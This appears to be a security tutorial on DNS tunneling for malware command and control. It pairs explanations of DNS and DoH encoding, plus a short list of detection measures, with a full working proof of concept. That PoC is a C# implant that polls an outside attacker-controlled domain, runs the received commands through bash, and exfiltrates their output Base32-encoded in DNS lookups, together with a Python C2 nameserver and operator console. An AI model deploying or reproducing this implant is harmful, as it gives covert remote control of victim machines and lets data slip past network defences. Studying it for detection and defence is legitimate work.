DNS Tunneling

The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can also be used as a transport mechanism for malware Command & Control (C2) messages. This is useful to an attacker when an environment has a restrictive web proxy that makes connecting outbound via HTTP difficult, since DNS resolution is usually still permitted.

The concept of DNS tunneling is simple. An attacker configures nameserver (NS) records so that a domain they control is delegated to their C2 server. For instance, they could configure an NS record for c2.malware.com, so that queries from any host for subdomains such as subdomain.c2.malware.com are ultimately answered by the C2 server, which acts as the authoritative nameserver for that zone.

In a corporate environment, a client typically sends its DNS request to an internal DNS server. If that server cannot answer the query itself, it resolves it recursively starting from the root servers (or forwards it to an upstream resolver). The DNS client therefore never connects directly to the attacker’s server.

Data from the client to the C2 server can be encoded within the hostname of an A record query. For example, a client could request test1.c2.malware.com, which the server can read to determine that the client’s ID is test1. The server can respond by encoding data in the IP address it returns. For instance, using ASCII encoding, the server could return the letters “wait” by responding with the IP address 119.97.105.116 (w = 119, a = 97, i = 105, t = 116).
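
A minimal Python sketch of the ASCII-to-IPv4 mapping described above. The function names are illustrative and not part of the PoC; padding short strings with spaces (ASCII 32) is an assumption that matches the server’s encodecommand() helper.

```python
def encode_ascii_as_ipv4(text: str) -> str:
    """Pack up to 4 ASCII characters into a dotted-quad IPv4 address.

    Shorter strings are right-padded with spaces (ASCII 32).
    """
    data = text.encode("ascii")  # raises UnicodeEncodeError for non-ASCII input
    if len(data) > 4:
        raise ValueError("an A record answer carries at most 4 bytes")
    return ".".join(str(b) for b in data.ljust(4, b" "))


def decode_ipv4_as_ascii(address: str) -> str:
    """Map each octet of a dotted-quad address back to one ASCII character."""
    return "".join(chr(int(octet)) for octet in address.split("."))


print(encode_ascii_as_ipv4("wait"))            # 119.97.105.116
print(decode_ipv4_as_ascii("119.97.105.116"))  # wait
```

Each answer carries only four bytes, which is why the server has to split longer commands across several lookups.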

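To upload larger amounts of data from the client to the server, the data can be Base32 encoded. Base32 is a suitable encoding mechanism since its alphabet (A-Z and 2-7) only contains characters that are permitted in domain names, apart from the “=” padding character, which never appears when the input length is a multiple of 5 bytes. Unlike Base64, it is also case-insensitive, which matters because DNS names are compared case-insensitively.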
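
The sketch below, using Python’s standard base64 module, shows why this works. The 63-octet label limit comes from RFC 1035; the regular expression is a simplified hostname-label check (an assumption for illustration, not a full validator). It also shows that “=” padding only appears when the input is not a multiple of 5 bytes, which is presumably why the PoC client pads each upload chunk to 30 bytes.

```python
import base64
import re

# Simplified hostname label: letters, digits and hyphens, 1 to 63 octets (RFC 1035 limit)
HOSTNAME_LABEL = re.compile(r"[A-Za-z0-9-]{1,63}")


def to_dns_label(chunk: bytes) -> str:
    """Base32-encode a chunk and check the result is usable as one DNS label."""
    label = base64.b32encode(chunk).decode("ascii")
    if not HOSTNAME_LABEL.fullmatch(label):
        raise ValueError(f"not usable as a hostname label: {label!r}")
    return label


sample = b"Hello from the DNS tunnel PoC!"  # 30 bytes, a multiple of 5
label = to_dns_label(sample)
print(label, len(label))  # a 48-character label with no '=' padding

# A resolver may change the case of a query name, so decode with casefold=True
assert base64.b32decode(label.lower(), casefold=True) == sample
```

A 31-byte chunk would produce “=” padding, and a 40-byte chunk a 64-character label; to_dns_label() rejects both.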

DNS tunneling is not restricted to A records. Other record types such as AAAA (16 bytes per address, versus 4 for an A record) or TXT (up to 255 bytes per character-string) can also be used, offering more space for encoded messages and therefore higher throughput.
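
As an illustration of the extra capacity, the following Python sketch packs 16 bytes into a single AAAA answer using the standard ipaddress module. It is a hypothetical scheme, not something the PoC implements; zero-padding on the right is an assumption of the sketch.

```python
import ipaddress


def encode_bytes_as_ipv6(payload: bytes) -> str:
    """Pack up to 16 bytes into an IPv6 address, zero-padding on the right."""
    if len(payload) > 16:
        raise ValueError("an AAAA record answer carries at most 16 bytes")
    return str(ipaddress.IPv6Address(payload.ljust(16, b"\x00")))


def decode_ipv6_as_bytes(address: str) -> bytes:
    """Recover the payload. Trailing zero bytes are treated as padding, so this
    simple scheme cannot carry payloads that genuinely end in 0x00."""
    return ipaddress.IPv6Address(address).packed.rstrip(b"\x00")


print(encode_bytes_as_ipv6(b"wait"))  # 7761:6974::
print(decode_ipv6_as_bytes(encode_bytes_as_ipv6(b"sixteen byte msg")))
```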

When a client communicates with the server, each request needs to be unique; otherwise intermediary DNS servers may answer from their cache and the query will never reach the C2 server.
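
The PoC client achieves this by appending a random value to its client ID (ClientID + RandomString(5) + C2Server), and the PoC server also returns a short TTL of 5 seconds. A Python sketch of the same idea follows; the client ID "AB12C" and the zone are placeholder values, and using the secrets module instead of a general-purpose RNG is a choice made for this sketch.

```python
import secrets
import string

NONCE_ALPHABET = string.ascii_uppercase + string.digits


def beacon_name(client_id: str, zone: str, nonce_len: int = 5) -> str:
    """Return '<client_id><random nonce>.<zone>'.

    The random suffix makes each query name unique, so a caching resolver has
    no cached answer and must forward the query towards the authoritative server.
    """
    nonce = "".join(secrets.choice(NONCE_ALPHABET) for _ in range(nonce_len))
    return f"{client_id}{nonce}.{zone}"


for _ in range(3):
    print(beacon_name("AB12C", "c2.mydomain.com"))
```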

DNS Record Configuration

The DNS records below were configured using GoDaddy’s DNS manager.

Type   Name   Value              TTL (seconds)
A      ns1    1.1.1.1            900
NS     c2     ns1.mydomain.com   900

Any DNS request for a subdomain of c2.mydomain.com (such as subdomain.c2.mydomain.com) will be delegated to ns1.mydomain.com, which resolves to the IP address of our C2 server (1.1.1.1 in this example).
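
Because of this delegation, the C2 server receives the full query name and has to separate the tunneled data from the zone name. The PoC server simply takes the first label (qn.split('.')[0]); the hypothetical helper below is a slightly stricter Python sketch that also checks the name really falls inside the delegated zone. Query names are often written with a trailing dot, so it is stripped first.

```python
from typing import Optional


def payload_label(qname: str, zone: str) -> Optional[str]:
    """Return whatever precedes the delegated zone in a query name.

    Returns None when the name is not strictly inside the zone. Names are
    lower-cased because DNS comparisons are case-insensitive.
    """
    name = qname.rstrip(".").lower()
    zone = zone.rstrip(".").lower()
    if not name.endswith("." + zone):
        return None
    return name[: -(len(zone) + 1)]


print(payload_label("ABCDE12345.c2.mydomain.com.", "c2.mydomain.com"))  # abcde12345
```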

DNS Over HTTPS (DoH)

DoH is a way of performing DNS lookups over an HTTPS connection.

Cloudflare provides documentation on how to perform these requests. From an attacker’s perspective, using DoH has a couple of benefits:

  • Traffic is encrypted by default. Unless HTTPS inspection is being performed, network analytics systems will not be able to interrogate the traffic.
  • The client network will only see connections to the DoH provider’s infrastructure, masking the real destination of the traffic.
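
The PoC client uses Cloudflare’s JSON API: a GET request with name and type query parameters and an Accept: application/dns-json header, returning a JSON document with an Answer array. This JSON format is a Cloudflare/Google convention; RFC 8484 itself specifies the binary application/dns-message format. The Python sketch below builds such a request without sending it and parses a response body. The sample response is hand-written for illustration, not captured from a real lookup.

```python
import json
import urllib.request
from urllib.parse import urlencode

# Endpoint used by the PoC client; Cloudflare also serves the JSON API at
# https://cloudflare-dns.com/dns-query
DOH_ENDPOINT = "https://1.1.1.1/dns-query"


def doh_json_request(name: str, rtype: str = "A") -> urllib.request.Request:
    """Build (but do not send) a JSON-format DoH GET request."""
    url = f"{DOH_ENDPOINT}?{urlencode({'name': name, 'type': rtype})}"
    return urllib.request.Request(url, headers={"Accept": "application/dns-json"})


def a_records(body: str) -> list[str]:
    """Extract A record (type 1) answers from a JSON DoH response body."""
    doc = json.loads(body)
    return [ans["data"] for ans in doc.get("Answer", []) if ans.get("type") == 1]


# Illustrative response body (hand-written, not from a real lookup)
SAMPLE = ('{"Status": 0, "Answer": [{"name": "abcde12345.c2.mydomain.com", '
          '"type": 1, "TTL": 5, "data": "119.97.105.116"}]}')

print(doh_json_request("abcde12345.c2.mydomain.com").full_url)
print(a_records(SAMPLE))  # ['119.97.105.116']
```

The request would be sent with urllib.request.urlopen(). Unlike the C# client, which keeps the data field of the last answer, this sketch filters on type 1 so that any CNAME entries in the answer chain are skipped.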

DNS Tunneling Detection

There are a number of things defenders can do to detect or prevent DNS tunneling:

  • Sinkhole known malicious DNS domains.
  • Perform DNS frequency analysis. Many SIEM systems provide use cases that trigger on large increases in the number of DNS requests from a host.
  • Most DNS C2 clients rely on Base32 or similar encoding mechanisms. This results in lookups for long, random-looking subdomains containing many digits. This is unusual behavior and can also be alerted on.
  • Block direct outbound DNS connections at the firewall. DNS traffic should only be allowed to leave the organisation from internal DNS servers.
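
The encoding heuristic can be sketched in a few lines of Python. The thresholds (labels of 32 or more characters, 3.0 bits of Shannon entropy per character, 20% digits, 10-character minimum) are assumptions chosen for illustration, not tuned values; legitimate names such as CDN hostnames will produce false positives, so a rule like this is best combined with the frequency analysis above.

```python
import math
from collections import Counter


def shannon_entropy(text: str) -> float:
    """Shannon entropy of a string in bits per character."""
    counts = Counter(text)
    total = len(text)
    return -sum(n / total * math.log2(n / total) for n in counts.values())


def looks_like_tunnel(qname: str,
                      long_label: int = 32,
                      min_entropy: float = 3.0,
                      min_digit_ratio: float = 0.2) -> bool:
    """Flag a query name whose longest label is very long, or is at least
    10 characters of high-entropy, digit-heavy text. Thresholds are illustrative."""
    labels = [label for label in qname.rstrip(".").split(".") if label]
    if not labels:
        return False
    longest = max(labels, key=len)
    if len(longest) >= long_label:
        return True
    digit_ratio = sum(ch.isdigit() for ch in longest) / len(longest)
    return (len(longest) >= 10
            and shannon_entropy(longest) >= min_entropy
            and digit_ratio >= min_digit_ratio)


for name in ["www.google.com", "AB12C7XK9Q.c2.mydomain.com"]:
    print(name, looks_like_tunnel(name))
```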

Creating a Proof of Concept Client

Below is a .NET 6 C# client for macOS. The client encodes data in A record lookups and performs requests using either standard DNS or DoH.

A Python DNS server is also provided. The server does not directly support DoH; however, the DoH service used by the client (in this case Cloudflare) performs an ordinary recursive DNS lookup on the client’s behalf, which is delegated to the server.
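
The command channel implemented by the code that follows can be modelled offline in a few lines. This Python simulation is for illustration only and is not part of the PoC; it follows the server’s main loop (4-character chunks, then 58.58.58.58 as the execute marker) and the client’s GetCommands() loop (ignore “wait”, buffer everything else, run the command on “::::”).

```python
from typing import Iterable, List, Optional

EXECUTE_MARKER = "58.58.58.58"  # decodes to "::::"


def server_queue(command: str) -> List[str]:
    """Operator side: split a command into 4-character chunks, encode each as an
    IPv4 address (space padded) and finish with the execute marker."""
    queue = []
    for i in range(0, len(command), 4):
        chunk = command[i:i + 4].encode("ascii").ljust(4, b" ")
        queue.append(".".join(str(b) for b in chunk))
    queue.append(EXECUTE_MARKER)
    return queue


def client_receive(addresses: Iterable[str]) -> Optional[str]:
    """Client side: decode answers until the marker arrives, ignoring 'wait'."""
    buffer = ""
    for address in addresses:
        text = "".join(chr(int(octet)) for octet in address.split("."))
        if text == "wait":
            continue
        if text == "::::":
            return buffer.strip()
        buffer += text
    return None  # marker never received


answers = ["119.97.105.116"] + server_queue("uname -a")
print(answers)
print(client_receive(answers))  # uname -a
```

One quirk the model makes visible: a 4-character chunk that is literally “wait” is indistinguishable from the idle response and is dropped, so client_receive(server_queue("waitwait")) returns an empty string.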

C# Client Code

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Text;
using DnsClient;
using Newtonsoft.Json;

public static class c2client
{
    //Config variables
    static String C2Server = ".test.bordergate.co.uk";
    // Client poll time in milliseconds
    static int C2delay = 2000;
    // Placeholder ClientID (will be randomly generated)
    static String ClientID = "XXXXX";
    // Use Cloudflare DNS over HTTPS
    static int UseDOH = 1;

    private static Random random = new Random();
    public static string RandomString(int length)
    {
        const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        return new string(Enumerable.Repeat(chars, length)
          .Select(s => s[random.Next(s.Length)]).ToArray());
    }

    public static string DecodeCommand(string address)
    //Convert IP address returned by server to ASCII
    {
        String result = "error";
        try
        {
            string[] octets = address.Split('.');
            result = "";
            foreach (var octet in octets)
            {
                int unicode = Convert.ToInt32(octet);
                char character = (char)unicode;
                string text = character.ToString();
                result += text;
            }
        }
        catch
        {
            Console.WriteLine("Error splitting string: " + address);
        }

        return result;
    }

    public static string DOHLookup(string domain)
    // Performs lookup using Cloudflare DOH
    {
        String ipv4 = "";
        try
        {
            string apiEndpoint = "https://1.1.1.1/dns-query?name=";
            using (var client = new HttpClient())
            {
                client.DefaultRequestHeaders
                 .Accept
                 .Add(new MediaTypeWithQualityHeaderValue("application/dns-json"));

                var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult();
                if (response.IsSuccessStatusCode)
                {
                    var responseContent = response.Content;
                    string results = responseContent.ReadAsStringAsync().GetAwaiter().GetResult();
                    Console.WriteLine(results);
                    dynamic dynObj = JsonConvert.DeserializeObject(results);
                    foreach (var answer in dynObj.Answer)
                    {
                        ipv4 = answer.data;
                    }
                }
            }
        }
        catch
        {
            Console.WriteLine("DOH lookup failed");
        }
        return ipv4;
    }

    public static string IPLookup(String domain)
    //Resolve a domain to IP address
    {
        string ip = "";

        if (UseDOH == 1)
        {
            ip = DOHLookup(domain);
        }
        else
        {
            var client = new LookupClient(
                new LookupClientOptions(NameServer.GooglePublicDns)
                {
                    UseCache = false,
                    EnableAuditTrail = false,
                    Retries = 10,
                    Timeout = TimeSpan.FromSeconds(20),
                    ThrowDnsErrors = false
                });

            foreach (var aRecord in client.Query(domain, QueryType.A).Answers.ARecords())
            {
                ip = aRecord.Address.ToString();
            }
        }
        return ip;
    }

    public static void GetCommands()
    // make a DNS request with a 5 character client ID, and 5 character random value (to prevent caching issues)
    {
        // Assign the static field (rather than declaring a local) so UploadResults() uses the same ID
        ClientID = RandomString(5);
        String CommandBuffer = "";

        while (true)
        {
            String request = ClientID + RandomString(5).ToString() + C2Server;
            String address = IPLookup(request);
            if (address == "")
            {
                Console.WriteLine("DNS Lookup failed: " + request);
                Console.WriteLine("Sleeping 10 seconds...");
                System.Threading.Thread.Sleep(10000);

            }
            else
            {
                String command = DecodeCommand(address.ToString());
                Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Server:" + command);

                if (command == "wait")
                {
                    // do nothing
                }
                else if (command == "::::")
                {
                    // :::: signifies the buffered command should be executed
                    Console.WriteLine(DateTime.Now.ToString("THH:mm:ss") + " Running command: '" + CommandBuffer + "'");
                    UploadResults(ExecCommand(CommandBuffer.Trim()));
                    CommandBuffer = "";
                }
                else
                {
                    CommandBuffer += command;
                }
            }

            System.Threading.Thread.Sleep(C2delay);
        }
    }

    public static string ExecCommand(String command)
    // Execute a command
    {
        try
        {
            Process p = new Process();
            p.StartInfo.UseShellExecute = false;
            p.StartInfo.RedirectStandardOutput = true;
            p.StartInfo.FileName = "bash";
            p.StartInfo.Arguments = " -c \"" + command + "\"";
            p.Start();
            string output = p.StandardOutput.ReadToEnd();
            p.WaitForExit();
            Console.Write(output);
            return output;
        }
        catch
        {
            Console.WriteLine("Error running command");
            return "Error running command: '" + command + "'";
        }
    }

    public static string UploadResults(String results)
    // Send results back to the server in 30-byte chunks. Each chunk is padded with
    // '^' to exactly 30 bytes so its Base32 form is 48 characters with no '='
    // padding, then sent as the hostname of an A record lookup.
    {
        IEnumerable<string> chunks = results.Split(30);

        foreach (string chunk in chunks)
        {
            if (chunk.Length != 30)
            {
                Console.WriteLine("Padding small chunk: " + chunk.Length);
            }

            // PadRight is a no-op for chunks that are already 30 characters long
            String paddedchunk = chunk.PadRight(30, '^');
            String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk));
            Console.WriteLine(Base32Encoded);
            IPLookup(ClientID + Base32Encoded + C2Server);
        }
        return "";
    }

    public static void Main()
    {
        GetCommands();
    }
}


public static class Extensions
{
    public static IEnumerable<string> Split(this string str, int n)
    {
        if (String.IsNullOrEmpty(str) || n < 1)
        {
            // Nothing to split; also avoids a NullReferenceException and an endless loop when n < 1
            yield break;
        }

        for (int i = 0; i < str.Length; i += n)
        {
            yield return str.Substring(i, Math.Min(n, str.Length - i));
        }
    }
}
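
The upload path can be checked with a short Python sketch, under the assumption that it mirrors UploadResults() on the client and the upload branch of the server’s dns_response(); it is for illustration and not a replacement for either. It confirms that each lookup label stays within the 63-octet limit (5 + 48 = 53 characters) and that the “^” padding is removed again on the server. Decoding with casefold=True is a choice of the sketch, guarding against resolvers that change the case of query names.

```python
import base64
from typing import List

CHUNK_BYTES = 30  # as in UploadResults()
PAD = b"^"        # padding character added by the client, stripped by the server
ID_LEN = 5        # client ID prefix length


def client_upload_labels(output: str, client_id: str) -> List[str]:
    """Mimic UploadResults(): split, pad to 30 bytes, Base32-encode, prefix the ID."""
    data = output.encode("ascii", errors="replace")  # non-ASCII becomes '?'
    labels = []
    for i in range(0, len(data), CHUNK_BYTES):
        chunk = data[i:i + CHUNK_BYTES].ljust(CHUNK_BYTES, PAD)
        labels.append(client_id + base64.b32encode(chunk).decode("ascii"))
    return labels


def server_reassemble(labels: List[str]) -> str:
    """Mimic the server's upload branch: drop the ID, decode, strip padding."""
    parts = [base64.b32decode(label[ID_LEN:], casefold=True).decode("ascii")
             for label in labels]
    return "".join(parts).replace(PAD.decode(), "")


text = "total 8\n-rw-r--r--  1 user  staff  42 notes.txt\n"
labels = client_upload_labels(text, "AB12C")
print([len(label) for label in labels])  # each label is 5 + 48 = 53 characters
print(server_reassemble(labels) == text)  # True
```

A side effect of stripping the padding this way is that any genuine “^” in the command output is lost.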

Client Base32 Encoding Library

using System;

namespace DNSC2
{
    public static class Base32Encoding
    {
        public static byte[] ToBytes(string input)
        {
            if (string.IsNullOrEmpty(input))
            {
                throw new ArgumentNullException("input");
            }

            input = input.TrimEnd('='); //remove padding characters
            int byteCount = input.Length * 5 / 8; //this must be TRUNCATED
            byte[] returnArray = new byte[byteCount];

            byte curByte = 0, bitsRemaining = 8;
            int mask = 0, arrayIndex = 0;

            foreach (char c in input)
            {
                int cValue = CharToValue(c);

                if (bitsRemaining > 5)
                {
                    mask = cValue << (bitsRemaining - 5);
                    curByte = (byte)(curByte | mask);
                    bitsRemaining -= 5;
                }
                else
                {
                    mask = cValue >> (5 - bitsRemaining);
                    curByte = (byte)(curByte | mask);
                    returnArray[arrayIndex++] = curByte;
                    curByte = (byte)(cValue << (3 + bitsRemaining));
                    bitsRemaining += 3;
                }
            }

            //if we didn't end with a full byte
            if (arrayIndex != byteCount)
            {
                returnArray[arrayIndex] = curByte;
            }

            return returnArray;
        }

        public static string ToString(byte[] input)
        {
            if (input == null || input.Length == 0)
            {
                throw new ArgumentNullException("input");
            }

            int charCount = (int)Math.Ceiling(input.Length / 5d) * 8;
            char[] returnArray = new char[charCount];

            byte nextChar = 0, bitsRemaining = 5;
            int arrayIndex = 0;

            foreach (byte b in input)
            {
                nextChar = (byte)(nextChar | (b >> (8 - bitsRemaining)));
                returnArray[arrayIndex++] = ValueToChar(nextChar);

                if (bitsRemaining < 4)
                {
                    nextChar = (byte)((b >> (3 - bitsRemaining)) & 31);
                    returnArray[arrayIndex++] = ValueToChar(nextChar);
                    bitsRemaining += 5;
                }

                bitsRemaining -= 3;
                nextChar = (byte)((b << bitsRemaining) & 31);
            }

            //if we didn't end with a full char
            if (arrayIndex != charCount)
            {
                returnArray[arrayIndex++] = ValueToChar(nextChar);
                while (arrayIndex != charCount) returnArray[arrayIndex++] = '='; //padding
            }

            return new string(returnArray);
        }

        private static int CharToValue(char c)
        {
            int value = (int)c;

            //65-90 == uppercase letters
            if (value < 91 && value > 64)
            {
                return value - 65;
            }
            //50-55 == numbers 2-7
            if (value < 56 && value > 49)
            {
                return value - 24;
            }
            //97-122 == lowercase letters
            if (value < 123 && value > 96)
            {
                return value - 97;
            }

            throw new ArgumentException("Character is not a Base32 character.", "c");
        }

        private static char ValueToChar(byte b)
        {
            if (b < 26)
            {
                return (char)(b + 65);
            }

            if (b < 32)
            {
                return (char)(b + 24);
            }

            throw new ArgumentException("Byte is not a valid Base32 value.", "b");
        }
    }
}
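
Because the server decodes uploads with Python’s base64.b32decode, the C# library must produce standard RFC 4648 Base32. One way to check this is to port ToString() to Python and compare it with base64.b32encode. The port below is a hand translation made for testing (it assumes the translation is faithful; it is not output from the C# code itself), and the alphabet is what ValueToChar() produces: 0-25 map to A-Z and 26-31 to 2-7.

```python
import base64

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"


def port_of_tostring(data: bytes) -> str:
    """Line-by-line Python port of Base32Encoding.ToString()."""
    char_count = -(-len(data) // 5) * 8  # Math.Ceiling(len / 5.0) * 8
    out = []
    next_char, bits_remaining = 0, 5
    for b in data:
        next_char = next_char | (b >> (8 - bits_remaining))
        out.append(ALPHABET[next_char])
        if bits_remaining < 4:
            next_char = (b >> (3 - bits_remaining)) & 31
            out.append(ALPHABET[next_char])
            bits_remaining += 5
        bits_remaining -= 3
        next_char = (b << bits_remaining) & 31
    if len(out) != char_count:  # partial final 5-byte group
        out.append(ALPHABET[next_char])
        out.extend("=" * (char_count - len(out)))
    return "".join(out)


# RFC 4648 section 10 test vectors
for vector in [b"f", b"fo", b"foo", b"foob", b"fooba", b"foobar"]:
    print(vector, port_of_tostring(vector), base64.b32encode(vector).decode())
```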

Python Server Code

#!/usr/bin/env python3

import argparse
import base64
import datetime
import sys
import time
import threading
import traceback
import socketserver
import struct
from dnslib import *
import logging

clientdict = {}
commandlist = []
clientid = ''
activeclient = ""

class DomainName(str):
    def __getattr__(self, item):
        return DomainName(item + '.' + self)

D = DomainName('')
IP = '1.1.1.1'
TTL = 1 * 5

soa_record = SOA(
    mname=D.ns1,      # primary name server
    rname=D.test,     # email of the domain administrator
    times=(
        201307231,    # serial number
        60 * 60 * 1,  # refresh
        60 * 60 * 3,  # retry
        60 * 60 * 24, # expire
        60 * 60 * 1,  # minimum
    )
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {}

def encodecommand(raw_command):
    # Take up to 4 characters of a command and encode them as an IPv4 address,
    # padding with spaces (ASCII 32), e.g. "ls" -> "108.115.32.32"
    responsearray = [32, 32, 32, 32]
    for i, letter in enumerate(raw_command[:4]):
        responsearray[i] = ord(letter)
    return ".".join(str(octet) for octet in responsearray)

def c2logic(qn):
#Check the domain requested. Supply commands back to client.
    global commandlist
    global clientid
    global clientdict
    global activeclient
    requestarray = qn.split(".")
    clientid = requestarray[0]
    clientid = clientid[:5]
   
    if clientid not in clientdict:
        print("new connection from: " + clientid)
        dt = datetime.datetime.now()
        clientdict[clientid] = str(dt)

    if (len(clientid) == 5) and (clientid == activeclient):
        if len(commandlist) != 0:
            logging.info("SERVER RESPONSE")
            logging.info(commandlist)
            logging.info(commandlist[0])
            response = commandlist[0]
            del commandlist[0]
        else:
            response = encodecommand("wait")
    else:
        logging.info("WAITING")
        response = encodecommand("wait")
    return response

def dns_response(data):
    request = DNSRecord.parse(data)
    reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)

    qname = request.q.qname
    qn = str(qname)
    qtype = request.q.qtype
    qt = QTYPE[qtype]
    D = qn
    logging.info("CLIENT REQUEST: " + qn)
    command = qn.split('.')[0]
    # A 10-character first label (5-character client ID + 5-character random value) is a beacon requesting a command
    if len(command) == 10:
        IP = c2logic(qn)
        if IP == '58.58.58.58':
            commandlist.clear()
        records = { D: [A(IP), AAAA((0,) * 16), soa_record]}

        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
        for rdata in ns_records:
            reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
        reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))
    else:
        # If not a command, it's a response from the client
        logging.info("CLIENT RESPONSE " + command)
        command = command[5:]
        logging.info("COMMAND " + command)
        # casefold=True: resolvers may change the case of the query name
        decoded = base64.b32decode(bytearray(command, 'ascii'), casefold=True).decode('utf-8')
        logging.info(decoded)
        #print(str(decoded),end = '')
        print(str(decoded).replace('^',''), end = '')
        IP = "9.9.9.9"
        records = { D: [A(IP), AAAA((0,) * 16), soa_record]}

        for name, rrs in records.items():
            if name == qn:
                for rdata in rrs:
                    rqt = rdata.__class__.__name__
                    if qt in ['*', rqt]:
                        reply.add_answer(RR(rname=qname, rtype=getattr(QTYPE, rqt), rclass=1, ttl=TTL, rdata=rdata))
        for rdata in ns_records:
            reply.add_ar(RR(rname=D, rtype=QTYPE.NS, rclass=1, ttl=TTL, rdata=rdata))
        reply.add_auth(RR(rname=D, rtype=QTYPE.SOA, rclass=1, ttl=TTL, rdata=soa_record))


    #print("---- Reply:\n", reply)
    return reply.pack()


class BaseRequestHandler(socketserver.BaseRequestHandler):

    def get_data(self):
        raise NotImplementedError

    def send_data(self, data):
        raise NotImplementedError

    def handle(self):
        try:
            data = self.get_data()
            self.send_data(dns_response(data))
        except Exception:
            # Malformed or unexpected requests are dropped; details are shown in debug (-d) mode
            logging.info("Failed to handle request", exc_info=True)


class TCPRequestHandler(BaseRequestHandler):

    def get_data(self):
        # No strip(): DNS messages are binary and may begin or end with whitespace byte values
        data = self.request.recv(8192)
        sz = struct.unpack('>H', data[:2])[0]
        if sz < len(data) - 2:
            raise Exception("Wrong size of TCP packet")
        elif sz > len(data) - 2:
            raise Exception("Too big TCP packet")
        return data[2:]

    def send_data(self, data):
        sz = struct.pack('>H', len(data))
        return self.request.sendall(sz + data)


class UDPRequestHandler(BaseRequestHandler):

    def get_data(self):
        # No strip(): DNS messages are binary and may begin or end with whitespace byte values
        return self.request[0]

    def send_data(self, data):
        return self.request[1].sendto(data, self.client_address)


def main():
    global activeclient
    parser = argparse.ArgumentParser(description='Start a DNS server implemented in Python. DNS servers usually use UDP on port 53.')
    parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
    parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
    parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
    parser.add_argument('-d', action='store_true', help='Debug mode')
    
    args = parser.parse_args()

    print("Starting nameserver...")
    args.udp = True  # UDP is always enabled; --tcp additionally starts a TCP listener
    servers = []
    if args.udp: servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler))
    if args.tcp: servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler))

    if args.d: logging.basicConfig(level=logging.INFO, format='%(asctime)s :: %(levelname)s :: %(message)s')

    for s in servers:
        thread = threading.Thread(target=s.serve_forever) 
        thread.daemon = True
        thread.start()
        print("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))

    try:
        while 1:

            #Take user input. Divide into 4 char chunks and encode. End with '::::'.
            usercommand = input("\n" + clientid + ">")
            if usercommand == "clients":
                print(clientdict)
            elif usercommand.startswith("active"):
                parts = usercommand.split()
                if len(parts) == 2:
                    activeclient = parts[1]
                    print("active client: " + activeclient)
                else:
                    print("usage: active <clientid>")
            else:
                csize = 4
                chunks = [usercommand[i:i+csize] for i in range(0, len(usercommand), csize)]
                for chunk in chunks:
                    commandlist.append(encodecommand(chunk))
                commandlist.append('58.58.58.58')
                sys.stderr.flush()
                sys.stdout.flush()

    except KeyboardInterrupt:
        pass
    finally:
        for s in servers:
            s.shutdown()

if __name__ == '__main__':
    main()